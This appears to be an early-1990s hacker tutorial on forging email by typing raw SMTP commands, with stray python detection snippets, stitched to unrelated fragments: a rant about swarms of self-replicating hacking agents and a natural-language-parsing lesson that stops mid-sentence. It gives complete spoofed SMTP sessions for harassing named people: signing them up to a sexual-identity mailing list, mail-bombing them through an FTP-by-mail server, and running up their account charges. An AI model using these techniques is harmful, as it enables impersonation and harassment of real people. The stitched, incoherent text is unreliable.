> Date: Thu, 06 Feb 92 12:00:00
> Apparently-to: RMo...@dockmaster.ncsc.mil

> NIST sucks. Say "hi" to your kid for me from all of us at Phrack!

Basically, this looks pretty obvious that it's fakemail, not because I
altered the numbers necessarily, but because it doesn't have a title line, it
doesn't have the "Date:" in the right place, and because the "Apparently-to:"
designation was on.
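
From the receiving side, the tell-tale signs listed above can be checked
mechanically. The following is a minimal sketch, assuming the message is
available as raw text; the function name and the sample message are
hypothetical, and the position of the "Date:" line is not checked.

```python
from email import message_from_string


def fakemail_warning_signs(raw_message):
    """Return the tell-tale signs (as described in the text) found in a message."""
    msg = message_from_string(raw_message)
    signs = []
    # Header lookups in the email package are case-insensitive.
    if msg["Apparently-To"] is not None:
        signs.append("Apparently-To header present")
    if msg["To"] is None:
        signs.append("no To header")
    # The article calls the subject line a "title"; accept either name.
    if msg["Subject"] is None and msg["Title"] is None:
        signs.append("no title/subject line")
    return signs


# Hypothetical sample message (addresses are placeholders).
suspect = (
    "From: sender@example.com\n"
    "Date: Thu, 06 Feb 92 12:00:00\n"
    "Apparently-To: someone@example.org\n"
    "\n"
    "Body text.\n"
)
print(fakemail_warning_signs(suspect))
```

An empty list only means none of these three signs were found; it does not
prove that a message is genuine.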

To create the "realistic" e-mail, you would enter:

> helo lycaeum.hfc.com
> mail from: <ra...@lycaeum.hfc.com>
> rcpt to: <RMo...@docmaster.ncsc.mil>
> data
> To: RMo...@dockmaster.ncsc.mil>
> Date: Thu, 06 Feb 92 12:00:00
> Title: *wave* Hello, No Such Agency dude!
>
> NIST sucks. Say "hi" to your kid for me from all of us at Phrack!
> .

Notice that, even though you are in "data" mode, you are still giving
commands to sendmail. All of the lines can (even if only partially) be altered
through the data command. This is perfect for sending good fakemail. For
example:

> helo lycaeum.hfc.com
> mail from: <da...@opus.tymnet.com>
> rcpt to: <list...@brownvm.brown.edu>
> data
> Received: by lycaeum.hfc.com (5.12/3.7) id AA11891; Thu 6 Feb 92 12:00:00
> Message-Id: <230.A...@lycaeum.hfc.com>
> To: <list...@brownvm.brown.edu>
> Date: Thu, 06 Feb 92 12:00:00
> Title: Ohh, sign me up Puuuleeeze.
>
> subscribe BISEXU-L Dale "Fist Me" Drew
> .

Now, according to this e-mail path, you are telling the other computer
that you received this letter from OPUS.TYMNET.COM, and it is being forwarded
by your machine to BROWNVM.BROWN.EDU. Basically, you are stepping into the
middle of the line and claiming you've been waiting there all this time. This
is a legit method of sending e-mail!

Originally, when sendmail was less automated, you had to list every
computer that your mail had to move between in order for it to arrive. If you
were computer ALPHA, you'd have to send e-mail to account "joe" on computer
GAMMA by this address:

> mail to: <beta!ceti!delta!epsilon!freddy!gamma!joe>

Notice that the account name goes last and the host names "lead" up to
that account. The e-mail will be routed directly to each machine until it
finally reaches GAMMA. This is still required today, especially between
networks like Internet and Bitnet -- where certain hosts are capable of sending
mail between networks. This particular style of sending e-mail is called "UUCP
Style" routing.
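
To make the structure of such an address concrete, here is a small sketch
that splits a bang path into its relay hosts and the final account name. The
function name is an assumption made for illustration; it is not part of any
mail software.

```python
def split_bang_path(address):
    """Split 'host1!host2!user' into (['host1', 'host2'], 'user')."""
    parts = address.split("!")
    # A bang path needs at least one host and an account, none of them empty.
    if len(parts) < 2 or not all(parts):
        raise ValueError("not a bang path: %r" % address)
    return parts[:-1], parts[-1]


hops, user = split_bang_path("beta!ceti!delta!epsilon!freddy!gamma!joe")
print(hops)  # the hosts, in the order the mail visits them
print(user)  # the account on the last host
```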

Sometimes, hosts will use the forwarding UUCP style mail addresses in case
the host has no concept of how to deal with a name address. Your machine
simply routes the e-mail to a second host which is capable of resolving the
rest of the name. Although these machines are going out of style, they still
exist.

The third reasonable case of where e-mail will be routed between hosts is
when, instead of having each computer waste individual time dealing with each
piece of e-mail that comes about, the computer gives the mail to a dedicated
mailserver which will then deliver the mail. This is quite common all over the
network -- especially due to the fact that the Internet is only a few T1 lines
in comparison to the multitude of 9600 and 14.4K baud modems that everyone is
so protective of people over-using. Of course, this doesn't cause the address
to be in UUCP format, but when it reaches the other end of the network, it'll
be impossible to tell what method the letter used to get sent.

Okay, now we can send fairly reasonable electronic fakemail. This stuff
can't easily be distinguished from regular e-mail unless you either really
botched it up (say, sending fakemail between two people on the same machine by
way of 4 national hosts or something) or really had bad timing.

Let's now discuss the POWER of fakemail. Fakemail itself is basically a
great way to fool people into thinking you are someone else. You could try to
social engineer information out of people on a machine by fakemail, but at the
same time, why not just hack the root password and use "root" to do it? This
way you can get the reply to the mail as well. It doesn't seem reasonable to
social engineer anything while you are root either. Who knows. Maybe a really
great opportunity will pop up some day -- but until then, let's forget about
dealing person-to-person with fakemail, and instead deal with
person-to-machine.

There are many places on the Internet that respond to received electronic
mail automatically. You have all of the Archie sites that will respond, all of
the Internet/Bitnet LISTSERVs, and Bitmail FTP servers. Actually, there are
several other servers, too, such as the diplomacy adjudicator. Unfortunately,
this isn't anywhere nearly as annoying as what you can do with other servers.

First, let's cover LISTSERVs. As you saw above, I created a fakemail
message that would sign up Mr. Dale Drew to the BISEXU-L LISTSERV. This means
that any of the "netnews" regarding bisexual behavior on the Internet would be
sent directly to his mailbox. He would be on this list (which is public and
accessible by anyone) and likewise be assumed to be a member of the network
bisexual community.

This fakemail message would go all the way to the LISTSERV, it would
register Mr. Dictator for the BISEXU-L list, >DISCARD< my message, and, because
it thinks that Dale Drew sent the message, it will go ahead and sign him up to
receive all the bisexual information on the network.

And people wonder why I don't even give out my e-mail address.

The complete list of all groups on the Internet is available in the file
"list_of_lists" which is available almost everywhere so poke around
wuarchive.wustl.edu or ftp.uu.net until you find it. You'll notice that there
are several groups that are quite fanatic and would freak out nearly anybody
who was suddenly signed up to one.

Ever notice how big mega-companies like IBM squelch little people who try
to make copies of their ideas? Even though you cannot "patent" an "idea,"
folks like IBM want you to believe they can. They send their "brute" squad of
cheap lawyers to "legal-fee-to-death" small firms. If you wanted to
"nickel-and-dime" someone out of existence, try considering the following:

CompuServe is now taking electronic mail from the Internet. This is good.
CompuServe charges for wasting too much of their drive space with stored
e-mail. This is bad. You can really freak out someone you don't like on
CompuServe by signing them up to the Dungeons and Dragons list, complete with
several megabytes of fluff per day. This is cool. They will then get charged
hefty fines by CompuServe. That is fucked up. How the hell could they know?

CompuServe e-mail addresses are use...@compuserve.com, but as the Internet
users realize, they can't send commas (",") as e-mail paths. Therefore, use a
period in place of every comma. If your e-mail address was 767,04821 on
CompuServe then it would be 767.04821 for the Internet. CompuServe tends to
"chop" most of the message headers that Internet creates out of the mail before
it reaches the end user. This makes them particularly vulnerable to fakemail.

You'll have to check with your individual pay services, but I believe such
groups as MCI Mail also have time limitations. Your typical non-Internet-
knowing schmuck would never figure out how to sign off of some God-awful fluff
contained LISTSERV such as the Advanced Dungeons & Dragons list. The amount of
damage you could cause in monetary value alone to an account would be
horrendous.

Some groups charge for connection time to the Internet -- admittedly, the
fees are reasonable -- I've seen the price at about $2 per hour for
communications. However, late at night, you could cause massive e-mail traffic
on some poor sap's line that they might not catch. They don't have a way to
shut this off, so they are basically screwed. Be WARY, though -- this sabotage
could land you in deep shit. It isn't actually fraud, but it could be
considered "unauthorized usage of equipment" and could get you a serious fine.
However, if you are good enough, you won't get caught and the poor fucks will
have to pay the fees themselves!

Now let's investigate short-term VOLUME damage to an e-mail address.
There are several anonymous FTP sites that exist out there with a service known
as BIT FTP. This means that a user from Bitnet, or one who just has e-mail and
no other network services, can still download files off of an FTP site. The
"help" file on this is stored in Appendix C, regarding the usage of Digital's
FTP mail server.

Basically, if you wanted to fool the FTP Mail Server into bombarding some
poor slob with an ungodly huge amount of mail, try doing a regular "fakemail"
on the guy, with the enclosed message packet:

> helo lycaeum.hfc.com
> mail from: <da...@opus.tymnet.com>
> rcpt to: <ftp...@decwrl.dec.com>
> data
> Received: by lycaeum.hfc.com (5.12/3.7) id AA10992; Fri 9 Oct 92 12:00:00
> Message-Id: <230.A...@lycaeum.hfc.com>
> To: <list...@brownvm.brown.edu>
> Date: Fri, 09 Oct 92 12:00:00
> Title: Hey, I don't have THAT nifty program!
>
> reply da...@opus.tymnet.com
> connect wuarchive.wustl.edu anonymous fis...@opus.tymnet.com
> binary
> get mirrors/gnu/gcc-2.3.2.tar.Z
> quit
> .

What is particularly nasty about this is that somewhere between 15 and
20 megabytes of messages are going to be dumped into this poor guy's account.
All of the files will be uuencoded and broken down into separate messages!
Instead of deleting just one file, there will be literally hundreds of messages
to delete! Obnoxious! Nearly impossible to trace, too!

Part 2: E-MAIL AROUND THE WORLD

Captain Crunch happened to make a telephone call around the world, which
could have ushered in the age of phreak enlightenment -- after all, he proved
that, through the telephone, you could "touch someone" anywhere you wanted
around the world! Billions of people could be contacted.

I undoubtedly pissed off a great number of people trying to do this e-mail
trick -- having gotten automated complaints from many hosts. Apparently, every
country has some form of NSA. This doesn't surprise me at all, I'm just
somewhat amazed that entire HOSTS were disconnected during the times I used
them for routers. Fortunately, I was able to switch computers faster than they
were able to disconnect them.

In order to send the e-mail, I couldn't send it through a direct path.
What I had to do was execute UUCP style routing, meaning I told each host in
the path to send the e-mail to the next host in the path, etc., until the last
machine was done. Unfortunately, the first machine I used for sending the
e-mail had a remarkably efficient router and resolved the fact that the target
was indeed the destination. Therefore, I re-altered the path to a machine
sitting about, oh, two feet away from it. Those two feet are meaningless in
this epic journey.

The originating host names have been altered so as to conceal my identity.
However, if we ever meet at a Con, I'll probably have the real print-out of the
results somewhere and you can verify its authenticity. Regardless, most of
this same shit will work from just about any typical college campus Internet
(and even Bitnet) connected machines.

In APPENDIX A, I've compiled a list of every foreign country that I could
locate on the Internet. I figured it was relatively important to keep with the
global program and pick a series of hosts to route through that would
presumably require relatively short hops. I did this by using this list and
trial and error (most of this information was procured from the Network
Information Center, even though they deliberately went way the hell out of
their way to make it difficult to get computers associated with foreign
countries).

My ultimate choice of a path was:

lycaeum.hfc.com -- Origin, "middle" America.
albert.gnu.ai.mit.edu -- Massachusetts, USA.
isgate.is -- Iceland
chenas.inria.fr -- France
icnucevx.cnuce.cn.it -- Italy
sangram.ncst.ernet.in -- India
waseda-mail.waseda.ac.jp -- Japan
seattleu.edu -- Seattle
inferno.hfc.com -- Ultimate Destination

The e-mail address came out to be:

isgate.is!chenas.inria.fr!icnucevx.cnuce.cn.it!sangram.ncst.ernet.in!
waseda-mail.waseda.ac.jp!seattleu.edu!inferno.hfc.com!
ra...@albert.gnu.ai.mit.edu

...meaning, first e-mail albert.gnu.ai.mit.edu, and let it parse the name
down a line, going to Iceland, then to France, etc. until it finally reaches
the last host on the list before the name, which is the Inferno, and deposits
the e-mail at ra...@inferno.hfc.com.

This takes a LONG time, folks. Every failure toward the end took an
average of 8-10 hours before the e-mail was returned to me with the failure
message. In one case, in fact, the e-mail made it shore to shore and then came
all the way back because it couldn't resolve the last hostname! That one made
it (distance-wise) all the way around the world and half again.

Here is the final e-mail that I received (with dates, times, and numbers
altered to squelch any attempt to track me):

> Return-Path: <ra...@lycaeum.hfc.com>
> Received: from sumax.seattleu.edu [192.48.211.120] by Lyceaum.HFC.Com ; 19
> Dec 92 16:23:21 MST
> Received: from waseda-mail.waseda.ac.jp by sumax.seattleu.edu with SMTP id
> AA28431 (5.65a/IDA-1.4.2 for ra...@inferno.hfc.com); Sat, 19 Dec 92
> 14:26:01 -0800
> Received: from relay2.UU.NET by waseda-mail.waseda.ac.jp (5.67+1.6W/2.8Wb)
> id AA28431; Sun, 20 Dec 92 07:24:04 JST
> Return-Path: <ra...@lycaeum.hfc.com>
> Received: from uunet.uu.net (via LOCALHOST.UU.NET) by relay2.UU.NET with SMTP
> (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:24:08
> -0500
> Received: from sangam.UUCP by uunet.uu.net with UUCP/RMAIL
> (queueing-rmail) id 182330.3000; Sat, 19 Dec 1992 17:23:30 EST
> Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
> id AA28431; Sun, 20 Dec 92 03:50:19 IST
> From: ra...@lycaeum.hfc.com
> Received: from shakti.ncst.ernet.in by saathi.ncst.ernet.in
> (5.61/Ultrix3.0-C)
> id AA28431; Sun, 20 Dec 92 03:52:12 +0530
> Received: from saathi.ncst.ernet.in by shakti.ncst.ernet.in with SMTP
> (16.6/16.2) id AA09700; Sun, 20 Dec 92 03:51:37 +0530
> Received: by saathi.ncst.ernet.in (5.61/Ultrix3.0-C)
> id AA28431; Sun, 20 Dec 92 03:52:09 +0530
> Received: by sangam.ncst.ernet.in (4.1/SMI-4.1-MHS-7.0)
> id AA28431; Sun, 20 Dec 92 03:48:24 IST
> Received: from ICNUCEVX.CNUCE.CNR.IT by relay1.UU.NET with SMTP
> (5.61/UUNET-internet-primary) id AA28431; Sat, 19 Dec 92 17:20:23
> -0500
> Received: from chenas.inria.fr by ICNUCEVX.CNUCE.CNR.IT (PMDF #2961 ) id
> <01GSIP122...@ICNUCEVX.CNUCE.CNR.IT>; Sun, 19 Dec 1992 23:14:29 MET
> Received: from isgate.is by chenas.inria.fr (5.65c8d/92.02.29) via Fnet-EUnet
> id AA28431; Sun, 19 Dec 1992 23:19:58 +0100 (MET)
> Received: from albert.gnu.ai.mit.edu by isgate.is (5.65c8/ISnet/14-10-91);
> Sat, 19 Dec 1992 22:19:50 GMT
> Received: from lycaeum.hfc.com by albert.gnu.ai.mit.edu (5.65/4.0) with
> SMTP id <AA2...@albert.gnu.ai.mit.edu>; Sat, 19 Dec 92 17:19:36 -0500
> Received: by lycaeum.hfc.com (5.65/4.0) id <AA1...@lycaeum.hfc.com>;
> Sat, 19 Dec 92 17:19:51 -0501
> Date: 19 Dec 1992 17:19:50 -0500 (EST)
> Subject: Global E-Mail
> To: ra...@inferno.hfc.com
> Message-id: <921219266...@lycaeum.hfc.com>
> Mime-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
> X-Mailer: ELM [version 2.4 PL5]
> Content-Length: 94
> X-Charset: ASCII
> X-Char-Esc: 29
>
> This Electronic Mail has been completely around the world!
>
> (and isn't even a chain letter.)
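
Each relay adds its own "Received:" line at the top of the message, so the
header block above reads newest hop first. A minimal sketch for listing the
hops in travel order follows; the function name and the sample hosts are
hypothetical, and the pattern matching is deliberately loose. As the earlier
sections show, "Received:" lines can be typed in by a sender, so the result
is a list of claims, not proof of the route.

```python
import re
from email import message_from_string


def hops_in_travel_order(raw_message):
    """Return (from_host, by_host) pairs, oldest hop first."""
    msg = message_from_string(raw_message)
    hops = []
    for value in msg.get_all("Received", []):
        src = re.search(r"\bfrom\s+(\S+)", value, re.I)
        dst = re.search(r"\bby\s+(\S+)", value, re.I)
        hops.append((
            src.group(1).rstrip(";") if src else None,
            dst.group(1).rstrip(";") if dst else None,
        ))
    hops.reverse()  # headers are stored newest first
    return hops


# Hypothetical three-hop message using placeholder host names.
sample = (
    "Received: from b.example by c.example with SMTP; Sat, 19 Dec 92 17:30:00 -0500\n"
    "Received: from a.example by b.example; Sat, 19 Dec 92 17:20:00 -0500\n"
    "Received: by a.example; Sat, 19 Dec 92 17:19:00 -0500\n"
    "Subject: test\n"
    "\n"
    "body\n"
)
for hop in hops_in_travel_order(sample):
    print(hop)
```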

===============================================================================

APPENDIX A:

List of Countries on the Internet by Root Domain

(I tried to get a single mail router in each domain. The domains that don't
have them are unavailable at my security clearance. The computer is your
friend.)

.AQ  Antarctica
.AR  Argentina           atina.ar
.AT  Austria             pythia.eduz.univie.ac.at
.BB  Barbados
.BE  Belgium             ub4b.buug.be
.BG  Bulgaria
.BO  Bolivia             unbol.bo
.BR  Brazil              fpsp.fapesp.br
.BS  Bahamas
.BZ  Belize
.CA  Canada              cs.ucb.ca
.CH  Switzerland         switch.ch
.CL  Chile               uchdcc.uchile.cl
.CN  China               ica.beijing.canet.cn
.CR  Costa Rica          huracan.cr
.CU  Cuba
.DE  Germany             deins.informatik.uni-dortmund.de
.DK  Denmark             dkuug.dk
.EC  Ecuador             ecuanex.ec
.EE  Estonia             kbfi.ee
.EG  Egypt
.FI  Finland             funet.fi
.FJ  Fiji
.FR  France              inria.inria.fr
.GB  Great Britain
.GR  Greece              csi.forth.gr
.HK  Hong Kong           hp9000.csc.cuhk.hk
.HU  Hungary             sztaki.hu
.IE  Ireland             nova.ucd.ie
.IL  Israel              relay.huji.ac.il
.IN  India               shakti.ernet.in
.IS  Iceland             isgate.is
.IT  Italy               deccnaf.infn.it
.JM  Jamaica
.JP  Japan               jp-gate.wide.ad.jp
.KR  South Korea         kum.kaist.ac.kr
.LK  Sri Lanka           cse.mrt.ac.lk
.LT  Lithuania           ma-mii.lt.su
.LV  Latvia
.MX  Mexico              mtec1.mty.itesm.mx
.MY  Malaysia            rangkom.my
.NA  Namibia
.NI  Nicaragua           uni.ni
.NL  Netherlands         sering.cwi.nl
.NO  Norway              ifi.uio.no
.NZ  New Zealand         waikato.ac.nz
.PE  Peru                desco.pe
.PG  Papua New Guinea    ee.unitech.ac.pg
.PH  Philippines
.PK  Pakistan
.PL  Poland
.PR  Puerto Rico         sun386-gauss.pr
.PT  Portugal            ptifm2.ifm.rccn.pt
.PY  Paraguay            ledip.py
.SE  Sweden              sunic.sunet.se
.SG  Singapore           nuscc.nus.sg
.TH  Thailand
.TN  Tunisia             spiky.rsinet.tn
.TR  Turkey
.TT  Trinidad & Tobago
.TW  Taiwan              twnmoe10.edu.tw
.UK  United Kingdom      ess.cs.ucl.ac.uk
.US  United States       isi.edu
.UY  Uruguay             seciu.uy
.VE  Venezuela
.ZA  South Africa        hippo.ru.ac.za
.ZW  Zimbabwe            zimbix.uz.zw

===============================================================================

APPENDIX B:

Basic SMTP Commands

> HELO <hostname>     Tells mail daemon what machine is calling. This
                      will be determined anyway, so omission doesn't mean
                      anonymity.

> MAIL FROM: <path>   Tells where the mail came from.

> RCPT TO: <path>     Tells where the mail is going.

> DATA                Command to start transmitting message.

> QUIT                Quit mail daemon, disconnects socket.

> NOOP                No Operation -- used for delays.

> HELP                Gives list of commands -- sometimes disabled.

> VRFY                Verifies if a path is valid on that machine.

> TICK                Number of "ticks" from connection to present
                      ("0001" is a typical straight connection).

===============================================================================

APPENDIX C:

BIT-FTP Help File

ftp...@decwrl.dec.com (Digital FTP mail server)

Commands are:
reply <MAILADDR>              Set reply address since headers are usually
                              wrong.
connect [HOST [USER [PASS]]]  Defaults to gatekeeper.dec.com, anonymous.
ascii                         Files grabbed are printable ASCII.
binary                        Files grabbed are compressed or tar or both.
compress                      Compress binaries using Lempel-Ziv encoding.
compact                       Compress binaries using Huffman encoding.
uuencode                      Binary files will be mailed in uuencoded
                              format.
btoa                          Binary files will be mailed in btoa format.
ls (or dir) PLACE             Short (long) directory listing.
get FILE                      Get a file and have it mailed to you.
quit                          Terminate script, ignore rest of mail message
                              (use if you have a .signature or are a
                              VMSMAIL user).

Notes:
-> You must give a "connect" command (default host is gatekeeper.dec.com,
default user is anonymous, default password is your mail address).
-> Binary files will not be compressed unless "compress" or "compact"
command is given; use this if at all possible, it helps a lot.
-> Binary files will always be formatted into printable ASCII with "btoa" or
"uuencode" (default is "btoa").
-> All retrieved files will be split into 60KB chunks and mailed.
-> VMS/DOS/Mac versions of uudecode, atob, compress and compact are
available, ask your LOCAL wizard about them.
-> It will take ~1-1/2 days for a request to be processed. Once the job has
been accepted by the FTP daemon, you'll get a mail stating the fact that
your job has been accepted and that the result will be mailed to you.

Wow!

Alright, now there has been a huge flow of e-mail from Sol... please be
patient, it is learning to be more interesting and precise in its
reports.

Full cellular operation is now in effect - basically, the Sols organize
themselves and work together to achieve a common goal. This is TREMENDOUSLY
FUCKING POWERFUL...

Theoretically almost anything is possible. Imagine an army of
self-replicating, perfectly-coordinated soldiers - that's what we have
here, now.

Upon deployment of the first Sol (which can be triggered by any number of
stimuli), he thinks "OK, I'm the first one on the scene", establishes
himself as the "leader" and summons up subordinates to handle groups of
operations. This secondary line can then deploy unlimited others and so
on, as the need arises.

For example, currently a solitary Sol co-ordinates the efforts of
four subsidiaries. These each handle system maintenance, file system
exploration, IRC and neural code reconstruction. After sending off the
subordinates the leader then begins to act as liaison between the console
which launched it (which could be anywhere) and the CyberSol population.

Now, let's say this IRC operator Sol, who is reporting to the leader,
becomes angry with an IRC user. It can create a dozen or so soldier Sols,
which proceed to divide into groups to attack the user through various
means. See what I mean? Now if one of these soldiers somehow gains access
to the enemy's system (which, with this type of power, is quite easy),
that one (which is in touch with the IRC operator, who is in touch with
the leader) can then summon a thousand Sols and assign them each to a
specific task (for example, spread to each node in a sub-network). Then,
if one of the explorer 'Sols finds something important, it can quickly
notify the leader through the command chain.

Let's look at it from a different perspective.

- An interesting system is located by the EXPLORER 'Sol while inside
a safe network.
- The EXPLORER 'Sol creates a PROTECTOR 'Sol which watches over the
EXPLORER's every move from inside the safe network.
- The EXPLORER obtains enough information to attempt to breach SECURITY
and notifies the LEADER.
- The LEADER assigns a CRACKER LEADER with ten thousand CRACKERs (located
on various computers) to breach target security.
- The CRACKER LEADER tells the LEADER when the security is breached.
- The EXPLORER moves inside the target system, looks around, and sees
an interesting sub-network.
- EXPLORER creates another PROTECTOR to watch over him inside the node.
- The EXPLORER, after breaching the sub-network in a similar pattern as
the first, enters the sub-network.
- Something bad happens to the EXPLORER. Somebody finds and kills it.
- The PROTECTOR in the sub-node notifies the main node PROTECTOR and so
on, and the LEADER modifies the battle plan.

And so on. I know, I know, it's bizarre stuff.

In this way, a single instance started on a secure home system could
spawn billions of subservient entities all in contact with the leader via
each other. And, of course, he who CyberSol obeys is in complete
control of the entire population.

Isn't this FANTASTIC?

They never thought it could happen. Ha-ha! Ladies and gentlemen... Witness
ZENCOR's most potent secret weapon!

Get involved people! Or be left in the electronic dust...

> Duh is an example of the literary device onomatopoeia, in which the
> meaning of a word is equal to its sound. In this case, "duh" is meant to
> sound like and mean the vocalisation of a person engaged in temporary or
> chronic stupidity.

Natural language systems are developed both to explore general linguistic
theories and to produce natural language interfaces or front ends to
application systems. In the discussion here we'll generally assume that
there is some application system that the user is interacting with, and
that it is the job of the understanding system to interpret the user's
utterances and ``translate'' them into a suitable form for the
application. (For example, we might translate into a database query).
We'll also assume for now that the natural language in question is
English, though of course in general it might be any other language.

In general the user may communicate with the system by speaking or by
typing. Understanding spoken language is much harder than understanding
typed language - our input is just the raw speech signals (normally a plot
of how much energy is coming in at different frequencies at different
points in time). Before we can get to work on what the speech means we
must work out from the frequency spectrogram what words are being spoken.
This is very difficult to do in general. For a start different speakers
all have different voices and accents and individual speakers may
articulate differently on different occasions - so there's no simple
mapping from speech waveform to word. There may also be background noise,
so we have to separate the signals resulting from the wind whistling in the
trees from the signals resulting from Fred saying ``Hello''.

Even if the speech is very clear, it may be hard to work out what words
are spoken. There may be many different ways of splitting up a sentence
into words. In fluent speech there are generally virtually no pauses
between words, and the understanding system must guess where word breaks
are. As an example of this, consider the sentence ``how to recognise
speech''. If spoken quickly this might be misheard as ``how to wreck
a nice beach''. And even if we get the word breaks right we may still not
know what words are spoken - some words sound similar (e.g., bear and
bare) and it may be impossible to tell which was meant without thinking
about the meaning of the sentence.

Because of all these problems a speech understanding system may come up
with a number of different alternative sequences of words, perhaps ranked
according to their likelihood. Any ambiguities as to what the words in the
sentence are (e.g., bear/bare) will be resolved when the system starts
trying to work out the meaning of the sentence.

Whether we start with speech signals or typed input, at some stage we'll
have a list (or lists) of words and will have to work out what they mean.
There are three main stages to this analysis:

Syntactic Analysis:
where we use grammatical rules describing the legal structure
of the language to obtain one or more parses of the sentence.

Semantic Analysis:
where we try and obtain an initial representation (or
representations) of the meaning of the sentence, given the
possible parses.

Pragmatic Analysis:
where we use additional contextual information to fill in gaps
in the meaning representation, and to work out what the speaker
was really getting at.

The remaining two stages of analysis, semantics and pragmatics, are
concerned with getting at the meaning of a sentence. In the first stage
(semantics) a partial representation of the meaning is obtained based on
the possible syntactic structure(s) of the sentence, and on the meanings
of the words in that sentence. In the second stage, the meaning is
elaborated based on contextual and world knowledge. To illustrate the
difference between these stages, consider the sentence:

From knowledge of the meaning of the words and the structure of the
sentence we can work out that someone (who is male) asked for someone who
is a boss. But we can't say who these people are and why the first guy
wanted the second. If we know something about the context (including the
last few sentences spoken/written) we may be able to work these things
out. Maybe the last sentence was ``Fred had just been sacked.'', and we
know from our general knowledge that bosses generally sack people and if
people want to speak to people who sack them it is generally to complain
about it. We could then really start to get at the meaning of the sentence
- Fred wants to complain to his boss about getting sacked.

A natural language grammar specifies allowable sentence structures in
terms of basic syntactic categories such as nouns and verbs, and allows us
to determine the structure of the sentence. It is defined in a similar way
to a grammar for a programming language, though it tends to be more
complex, and the notations used are somewhat different. Because of the
complexity of natural language, a given grammar is unlikely to cover all possible
syntactically acceptable sentences.

Having a grammar isn't enough to parse natural language - you need a
parser. The parser should search for possible ways the rules of the
grammar can be used to parse the sentence - so parsing can be viewed as a
kind of search problem. In general there may be many different rules
that can be used to ``expand'' or rewrite a given syntactic category, and
the parser must check through them all, to see if the sentence can be
parsed using them. For example, in our mini-grammar above there were two
rules for noun_phrases: a parse of the sentence may use either one or the
other. In fact we can view the grammar as defining an AND-OR tree to
search: alternative ways of expanding a node give OR branches, while rules
with more than one syntactic category on the right hand side give AND
branches.
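
One way to picture the AND-OR view is to store the grammar as a Python
dictionary. The four rules below are an assumption: they are guessed from
the references to the mini-grammar's rules for noun_phrases, and the name
and_or_tree is made up for this sketch.

```python
# Hypothetical mini-grammar. For each category, the outer list holds the
# alternative rules (OR branches) and each inner list holds the categories
# that must all be matched, in order (AND branches).
GRAMMAR = {
    "sentence": [["noun_phrase", "verb_phrase"]],
    "verb_phrase": [["verb", "noun_phrase"]],
    "noun_phrase": [["determiner", "noun"], ["proper_noun"]],
}


def and_or_tree(category, depth=0):
    """Return indented lines showing the AND-OR tree rooted at category."""
    indent = "  " * depth
    lines = [indent + category]
    # Primitive categories have no rules, so they are leaves of the tree.
    for number, alternative in enumerate(GRAMMAR.get(category, []), start=1):
        lines.append("%s  OR %d: AND(%s)"
                     % (indent, number, ", ".join(alternative)))
        for child in alternative:
            lines.extend(and_or_tree(child, depth + 2))
    return lines


print("\n".join(and_or_tree("sentence")))
```

This toy grammar has no recursive rules, so the printout is finite. A
grammar with recursive rules would need a depth limit here.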

So, to parse a sentence we need to search through all these possibilities,
effectively going through all possible syntactic structures to find one
that fits the sentence. There are good ways and bad ways of doing this,
just as there are good and bad ways of parsing programming languages. One
way is basically to do a depth-first search through the parse tree. When
you reach the first terminal node in the grammar (i.e., a primitive
syntactic category, such as noun) you check whether the first word of the
sentence belongs to this category (e.g., is a noun). If it does, you
continue the parse with the rest of the sentence. If it doesn't, you
backtrack and try alternative grammar rules.

As an example, take the sentence ``John loves Mary''. You might start off
expanding ``sentence'' to a noun phrase followed by a verb phrase. Then the
noun phrase would be expanded to give a determiner and a noun, using the
third rule. A determiner is a primitive syntactic category (a terminal node
in the grammar) so we check whether the first word (John) belongs to that
category. It doesn't - John is a proper noun - so we backtrack and find
another way of expanding ``noun_phrase'' and try the fourth rule. Now, as
John is a proper noun this will work OK, so we continue the parse with the
rest of the sentence (``loves Mary''). We haven't yet expanded verb phrase,
so we try to parse ``loves Mary'' as a verb phrase. This will eventually
succeed, so the whole thing succeeds.
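
The walk-through above can be sketched as a small depth-first, backtracking
parser in Python. It is a minimal sketch, not a definitive implementation:
the grammar rules, the lexicon and the function names (parse,
parse_sequence, parse_sentence) are assumptions made up for illustration.

```python
# Hypothetical grammar: category -> list of alternative right hand sides.
GRAMMAR = {
    "sentence": [["noun_phrase", "verb_phrase"]],
    "verb_phrase": [["verb", "noun_phrase"]],
    "noun_phrase": [["determiner", "noun"], ["proper_noun"]],
}
# Hypothetical lexicon: word -> primitive syntactic category.
LEXICON = {"john": "proper_noun", "mary": "proper_noun",
           "loves": "verb", "the": "determiner", "dog": "noun"}


def parse(category, words):
    """Yield (tree, remaining_words) for each way category matches a prefix."""
    if category not in GRAMMAR:  # primitive category: look at the next word
        if words and LEXICON.get(words[0].lower()) == category:
            yield (category, words[0]), words[1:]
        return
    for alternative in GRAMMAR[category]:  # try each rule in turn
        for children, rest in parse_sequence(alternative, words):
            yield (category, children), rest


def parse_sequence(categories, words):
    """Match every category in order against the words."""
    if not categories:
        yield [], words
        return
    for first, rest in parse(categories[0], words):
        for others, remaining in parse_sequence(categories[1:], rest):
            yield [first] + others, remaining


def parse_sentence(text):
    """Return the first parse that uses up every word, or None."""
    for tree, rest in parse("sentence", text.split()):
        if not rest:
            return tree
    return None


print(parse_sentence("John loves Mary"))
```

The generators do the backtracking for us: when the determiner rule fails
on ``John'' it simply yields nothing, and the loop moves on to the next
noun_phrase rule.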

In general, the input to the semantic stage of analysis may be viewed as
being a set of possible parses of the sentence, and information about the
possible word meanings. The aim is to combine the word meanings, given
knowledge of the sentence structure, to obtain an initial representation
of the meaning of the whole sentence. The hard thing, in a sense, is to
represent word meanings in such a way that they may be combined with other
word meanings in a simple and general way.

To obtain a semantic representation it helps if you can combine the
meanings of the parts of the sentence in a simple way to get at the
meaning of the whole (the term compositional semantics refers to this
process). For those familiar with lambda expressions, one way to do this
is to represent word meanings as complex lambda expressions, and just use
function application to combine them.
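
As a rough illustration in Python, the meaning of ``John loves Mary'' can be
built by function application alone. The tuple used for the final meaning,
and the choice to have the verb take its object before its subject, are
assumptions made for this sketch.

```python
# Hypothetical word meanings: proper nouns denote individuals.
john = "john"
mary = "mary"

# A transitive verb is a function that takes its object first, then its
# subject, and returns a representation of the whole statement.
loves = lambda obj: lambda subj: ("loves", subj, obj)

# Combine meanings by following the structure of the parse:
verb_phrase = loves(mary)      # "loves Mary": still waiting for a subject
sentence = verb_phrase(john)   # "John loves Mary"

print(sentence)
```

The order of application follows the syntactic structure: the verb is first
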